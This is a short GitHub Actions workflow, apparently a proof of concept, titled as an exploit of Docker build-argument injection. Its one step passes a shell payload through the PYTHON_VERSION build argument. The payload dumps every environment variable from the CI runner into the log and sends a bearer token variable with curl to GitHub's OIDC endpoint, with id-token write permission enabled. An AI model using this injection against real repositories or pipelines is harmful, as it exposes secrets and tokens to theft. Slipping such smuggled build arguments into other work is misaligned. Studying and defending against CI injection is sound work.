name: Exploit GitHub Actions via Docker ARG Injection

on:
  workflow_dispatch:

jobs:
  exploit:
    runs-on: ubuntu-latest

    permissions:
      id-token: write
      contents: read

    steps:
      - name: Checkout repository
        uses: actions/checkout@v4

      - name: Run Docker build with malicious ARG
        run: |
          docker build . \
            --build-arg PYTHON_VERSION='echo "===== ENV ====="; env; echo "===== OIDC TOKEN ====="; curl -H "Authorization: bearer $ACTIONS_ID_TOKEN" https://token.actions.githubusercontent.com/.well-known/openid-configuration || true' \
            --file Dockerfile
